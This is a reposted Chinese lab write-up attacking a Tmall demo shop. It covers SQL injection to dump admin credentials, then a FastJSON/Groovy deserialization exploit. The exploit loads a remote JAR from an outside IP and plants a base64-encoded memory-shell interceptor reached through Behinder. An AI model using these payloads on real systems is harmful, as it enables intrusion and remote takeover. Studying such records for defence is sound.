Tmall 靶场记录

admin 2024年5月19日02:05:53评论19 views字数 10917阅读36分23秒阅读模式
一、SQL注入 漏洞

首页搜索框添存在SQL注入漏洞

Tmall 靶场记录

orderBy参数发现此参数存在SQL注入漏洞

Tmall 靶场记录

SQLMap发现存在SQL注入漏洞

Tmall 靶场记录

查库:tmalldemodb

Tmall 靶场记录

查表

Tmall 靶场记录

查用户

Tmall 靶场记录

获取用户admin/rkmslmnncompilerinternal

登录后台

Tmall 靶场记录

二、FastJSON 漏洞

1、登录后台

所有产品-添加一个产品处存在漏洞

Tmall 靶场记录

添加产品页面

Tmall 靶场记录

抓包,http://192.168.0.104:8080/tmall/admin/product请求中存在参数propertyJson可发送JSON串至后台,存在FASTJSON漏洞

构造恶意包:

Tmall 靶场记录

Dnslog平台接收到请求,存在漏洞

Tmall 靶场记录

2、漏洞利用

2.1、添加白名单

{  "@type":"java.lang.Exception",  "@type":"org.codehaus.groovy.control.CompilationFailedException",  "unit":{  }}
Tmall 靶场记录

2.2、编辑恶意JAR包

Jar包模板地址:https://github.com/Lonely-night/fastjsonVul/

添加依赖:

<dependencies>    <dependency>        <groupId>org.codehaus.groovy</groupId>        <artifactId>groovy-all</artifactId>        <version>3.0.1</version>        <scope>provided</scope>        <type>pom</type>    </dependency>    <dependency>        <groupId>org.springframework</groupId>        <artifactId>spring-webmvc</artifactId>        <version>5.1.7.RELEASE</version>    </dependency>    <dependency>        <groupId>javax.servlet</groupId>        <artifactId>javax.servlet-api</artifactId>        <version>4.0.1</version>        <scope>provided</scope>    </dependency></dependencies>

创建恶意类:GrabAnnotationTransformation2

package groovy.grape;import org.codehaus.groovy.ast.ASTNode;import org.codehaus.groovy.control.CompilePhase;import org.codehaus.groovy.control.SourceUnit;import org.codehaus.groovy.transform.ASTTransformation;import org.codehaus.groovy.transform.GroovyASTTransformation;import sun.misc.BASE64Decoder;import org.springframework.web.context.WebApplicationContext;import org.springframework.web.context.request.RequestContextHolder;import org.springframework.web.context.request.ServletRequestAttributes;import org.springframework.web.servlet.HandlerInterceptor;import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;import org.springframework.web.servlet.support.RequestContextUtils;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.util.List;@GroovyASTTransformation(phase= CompilePhase.CONVERSION)public class GrabAnnotationTransformation2 implements ASTTransformation {    public GrabAnnotationTransformation2() {        try {            // 获取当前应用上下文            WebApplicationContext context = RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());            // 通过 context 获取 RequestMappingHandlerMapping 对象            RequestMappingHandlerMapping mapping = context.getBean(RequestMappingHandlerMapping.class);            ClassLoader classLoader = Thread.currentThread().getContextClassLoader();            Class clazz = null;            try{                clazz = classLoader.loadClass("com.feihong.ldap.template.DynamicFilterTemplate");            }catch(ClassNotFoundException e){                try{                    BASE64Decoder base64Decoder = new BASE64Decoder();                    String codeClass = "yv66vgAAADQBHgoAPgCMCAB0CwCNAI4KAAoAjwgAkAoAkQCSCgAKAJMIAJQKAAoAlQcAlggAlwgA" +                            "mAgAmQgAmgoAmwCcCgCbAJ0KAJ4AnwsAoAChCACiCgCjAKQHAKUKABUApgcApwoAFwCoCgAXAKkK" +                            "AKMAqggAqwsAjQCsBwCtCgAdAIwIAG4KAB0ArggAcAgAaAsAjQCvCACwCgAKALEIALIIALMLALQA" +                            "tQgAtgoAtwC4BwC5CgAKALoKACsAuwoAtwC8CAC9CgAyAL4IAL8HAMAHAGUJAMEAwgoAMgDDCgDE" +                            "AMUHAMYKADcAjAsAjQDHCgA3AMgKALcAyQoAPgDKCgAyAMsHAMwKAMEAzQoAxADOCgAyAM8KAD4A" +                            "sQcA0AoAQwDRBwDSBwDTAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA" +                            "EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABZMTXlIYW5kbGVySW50ZXJjZXB0b3I7AQAJcHJl" +                            "SGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9z" +                            "ZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAB2lz" +                            "TGludXgBAAFaAQAFb3NUeXABABJMamF2YS9sYW5nL1N0cmluZzsBAARjbWRzAQATW0xqYXZhL2xh" +                            "bmcvU3RyaW5nOwEAB3Byb2Nlc3MBABNMamF2YS9sYW5nL1Byb2Nlc3M7AQACaW4BABVMamF2YS9p" +                            "by9JbnB1dFN0cmVhbTsBAAxyZXN1bHRSZWFkZXIBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRl" +                            "cjsBAAhzdGRJbnB1dAEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAAXMBAAFrAQABYwEAFUxq" +                            "YXZheC9jcnlwdG8vQ2lwaGVyOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7" +                            "AQAOZXZpbGNsYXNzX2J5dGUBAAJbQgEACWV2aWxjbGFzcwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAH" +                            "c2Vzc2lvbgEAIExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQALcGFnZUNvbnRleHQB" +                            "ABNMamF2YS91dGlsL0hhc2hNYXA7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3JlcXVl" +                            "c3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEA" +                            "KExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGph" +                            "dmEvbGFuZy9PYmplY3Q7AQADY21kAQANU3RhY2tNYXBUYWJsZQcAlgcAVQcA0gcA1AcA1QcAzAcA" +                            "1gcA1wcApQcApwcA0AEACkV4Y2VwdGlvbnMBABBNZXRob2RQYXJhbWV0ZXJzAQAKcG9zdEhhbmRs" +                            "ZQEAkihMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2Vydmxl" +                            "dC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7TGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdm" +                            "cmFtZXdvcmsvd2ViL3NlcnZsZXQvTW9kZWxBbmRWaWV3OylWAQAMbW9kZWxBbmRWaWV3AQAuTG9y" +                            "Zy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvTW9kZWxBbmRWaWV3OwEAD2FmdGVyQ29tcGxl" +                            "dGlvbgEAeShMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2Vy" +                            "dmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFu" +                            "Zy9FeGNlcHRpb247KVYBAAJleAEAClNvdXJjZUZpbGUBABlNeUhhbmRsZXJJbnRlcmNlcHRvci5q" +                            "YXZhDABHAEgHANQMANgA2QwA2gDbAQAHb3MubmFtZQcA3AwA3QDZDADeAN8BAAN3aW4MAOAA4QEA" +                            "EGphdmEvbGFuZy9TdHJpbmcBAAJzaAEAAi1jAQAHY21kLmV4ZQEAAi9jBwDiDADjAOQMAOUA5gcA" +                            "1gwA5wDoBwDVDADpAOoBAAU8cHJlPgcA6wwA7ADtAQAZamF2YS9pby9JbnB1dFN0cmVhbVJlYWRl" +                            "cgwARwDuAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgwARwDvDADwAN8MAPEA7QEABjwvcHJlPgwA" +                            "8gDzAQARamF2YS91dGlsL0hhc2hNYXAMAPQA9QwA9gDfAQAEUE9TVAwA9wD4AQAQZTQ1ZTMyOWZl" +                            "YjVkOTI1YgEAAXUHAPkMAPoA+wEAA0FFUwcA/AwA/QD+AQAfamF2YXgvY3J5cHRvL3NwZWMvU2Vj" +                            "cmV0S2V5U3BlYwwA/wEADABHAQEMAQIBAwEAFWphdmEubGFuZy5DbGFzc0xvYWRlcgwBBAEFAQAL" +                            "ZGVmaW5lQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MHAQYMAQcAZwwBCAEJBwEKDAELAQwBABZzdW4v" +                            "bWlzYy9CQVNFNjREZWNvZGVyDAENAQ4MAQ8BEAwBEQESDAETARQMARUBFgEAEGphdmEvbGFuZy9P" +                            "YmplY3QMARcBGAwBGQEaDAEbARwBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAEdAEgBABRNeUhhbmRs" +                            "ZXJJbnRlcmNlcHRvcgEAMm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvSGFuZGxlcklu" +                            "dGVyY2VwdG9yAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4" +                            "L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQARamF2YS9sYW5nL1Byb2Nlc3MBABNq" +                            "YXZhL2lvL0lucHV0U3RyZWFtAQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylM" +                            "amF2YS9sYW5nL1N0cmluZzsBAAdpc0VtcHR5AQADKClaAQAQamF2YS9sYW5nL1N5c3RlbQEAC2dl" +                            "dFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5z" +                            "AQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRS" +                            "dW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJp" +                            "bmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5w" +                            "dXRTdHJlYW07AQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lv" +                            "L1ByaW50V3JpdGVyAQAFcHJpbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABgoTGphdmEvaW8v" +                            "SW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAdwcmludGxu" +                            "AQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAANwdXQB" +                            "ADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0" +                            "OwEACWdldE1ldGhvZAEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEAHmphdmF4L3Nl" +                            "cnZsZXQvaHR0cC9IdHRwU2Vzc2lvbgEACHB1dFZhbHVlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xq" +                            "YXZhL2xhbmcvT2JqZWN0OylWAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAC2dldEluc3RhbmNlAQAp" +                            "KExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgp" +                            "W0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tl" +                            "eTspVgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAR" +                            "amF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFu" +                            "Zy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAY" +                            "amF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAlnZXRSZWFk" +                            "ZXIBABooKUxqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEADGRlY29kZUJ1ZmZlcgEAFihMamF2YS9s" +                            "YW5nL1N0cmluZzspW0IBAAdkb0ZpbmFsAQAGKFtCKVtCAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xh" +                            "bmcvQ2xhc3M7AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAH" +                            "dmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9P" +                            "YmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAtuZXdJbnN0YW5j" +                            "ZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAPcHJpbnRTdGFja1RyYWNlACEARQA+AAEARgAAAAQA" +                            "AQBHAEgAAQBJAAAALwABAAEAAAAFKrcAAbEAAAACAEoAAAAGAAEAAAAMAEsAAAAMAAEAAAAFAEwA" +                            "TQAAAAEATgBPAAMASQAAA5oABgANAAABsisSArkAAwIAOgQZBMYAvxkEtgAEmgC3BDYFEgW4AAY6" +                            "BhkGxgATGQa2AAcSCLYACZkABgM2BRUFmQAfBr0AClkDEgtTWQQSDFNZBSsSArkAAwIAU6cAHAa9" +                            "AApZAxINU1kEEg5TWQUrEgK5AAMCAFM6B7gADxkHtgAQOggZCLYAEToJLLkAEgEAEhO2ABS7ABVZ" +                            "GQm3ABY6CrsAF1kZCrcAGDoLAToMGQu2ABlZOgzGABEsuQASAQAZDLYAGqf/6iy5ABIBABIbtgAU" +                            "K7kAHAEAOgW7AB1ZtwAeOgYZBhIfK7YAIFcZBhIhLLYAIFcZBhIiGQW2ACBXK7kAIwEAEiS2ACWZ" +                            "AKMSJjoHGQUSJxkHuQAoAwASKbgAKjoIGQgFuwArWRkHtgAsEim3AC22AC4SL7gAMBIxBr0AMlkD" +                            "EjNTWQSyADRTWQWyADRTtgA1OgkZCQS2ADYZCLsAN1m3ADgruQA5AQC2ABm2ADq2ADs6ChkJKrYA" +                            "PLYAPQa9AD5ZAxkKU1kEA7gAP1NZBRkKvrgAP1O2AEDAADI6CxkLtgBBGQa2AEJXpwAKOgUZBbYA" +                            "RASsAAEAywGmAakAQwADAEoAAACSACQAAAAOAAoADwAXABAAGgARACEAEgAzABMANgAVAGoAFgBy" +                            "ABcAfAAYAIMAGgCOABwAmQAdAKQAHgCnAB8AsgAgAMAAIgDLACcA0wAqANwAKwDlACwA7gAtAPgA" +                            "LwEGADABCgAxARUAMgEcADMBMAA2AVEANwFXADgBcQA5AZsAOgGmAD4BqQA8AasAPQGwAD8ASwAA" +                            "ANQAFQAaALEAUABRAAUAIQCqAFIAUwAGAHIAWQBUAFUABwB8AE8AVgBXAAgAgwBIAFgAWQAJAJkA" +                            "MgBaAFsACgCkACcAXABdAAsApwAkAF4AUwAMAQoAnABfAFMABwEcAIoAYABhAAgBUQBVAGIAYwAJ" +                            "AXEANQBkAGUACgGbAAsAZgBnAAsA0wDTAGgAaQAFANwAygBqAGsABgGrAAUAbABtAAUAAAGyAEwA" +                            "TQAAAAABsgBuAG8AAQAAAbIAcABxAAIAAAGyAHIAcwADAAoBqAB0AFMABAB1AAAAXAAJ/gA2BwB2" +                            "AQcAdiBYBwB3/wA2AA0HAHgHAHkHAHoHAHsHAHYBBwB2BwB3BwB8BwB9BwB+BwB/BwB2AAAY/wAK" +                            "AAUHAHgHAHkHAHoHAHsHAHYAAPsA2kIHAIAGAIEAAAAEAAEAQwCCAAAADQMAbgAAAHAAAAByAAAA" +                            "AQCDAIQAAwBJAAAAUwAAAAUAAAABsQAAAAIASgAAAAYAAQAAAEMASwAAADQABQAAAAEATABNAAAA" +                            "AAABAG4AbwABAAAAAQBwAHEAAgAAAAEAcgBzAAMAAAABAIUAhgAEAIEAAAAEAAEAQwCCAAAAEQQA" +                            "bgAAAHAAAAByAAAAhQAAAAEAhwCIAAMASQAAAFMAAAAFAAAAAbEAAAACAEoAAAAGAAEAAABGAEsA" +                            "AAA0AAUAAAABAEwATQAAAAAAAQBuAG8AAQAAAAEAcABxAAIAAAABAHIAcwADAAAAAQCJAG0ABACB" +                            "AAAABAABAEMAggAAABEEAG4AAABwAAAAcgAAAIkAAAABAIoAAAACAIs=";                    byte[] bytes = base64Decoder.decodeBuffer(codeClass);                    Method method = null;                    Class clz = classLoader.getClass();                    while(method == null && clz != Object.class ){                        try{                            method = clz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);                        }catch(NoSuchMethodException ex){                            clz = clz.getSuperclass();                        }                    }                    method.setAccessible(true);                    clazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length);                }catch (Exception ex){                    //continue;                }            }            Field f = null;            f = mapping.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField("adaptedInterceptors");            f.setAccessible(true);            List<HandlerInterceptor> list = null;            list = (List<HandlerInterceptor>) f.get(mapping);            //list.add((HandlerInterceptor) DynamicUtils.getClass(INTERCEPTOR_CLASS_STRING).newInstance());            list.add((HandlerInterceptor) clazz.newInstance());        }catch (Exception e){        }    }    @Override    public void visit(ASTNode[] nodes, SourceUnit source) {    }}

创建文件:

META-INF/services/org.codehaus.groovy.transform.ASTTransformation

文件内容:

groovy.grape.GrabAnnotationTransformation2

目录如下:

Tmall 靶场记录

打包上传至云服务器

3、漏洞攻击

在attack.jar目录下启动http服务

Tmall 靶场记录

构造包发送

{  "@type":"org.codehaus.groovy.control.ProcessingUnit",  "@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit",  "config":{    "@type": "org.codehaus.groovy.control.CompilerConfiguration",    "classpathList":["http://101.43.35.33/attack-1.jar"]}}
Tmall 靶场记录

云服务器接收到请求

Tmall 靶场记录

冰蝎连接

Tmall 靶场记录

如您有问题、建议、需求、合作、加群交流请后台留言或添加微信

Tmall 靶场记录
image.png

原文始发于微信公众号(白给信安):Tmall 靶场记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日02:05:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Tmall 靶场记录http://cn-sec.com/archives/2033050.html

发表评论

匿名网友 填写信息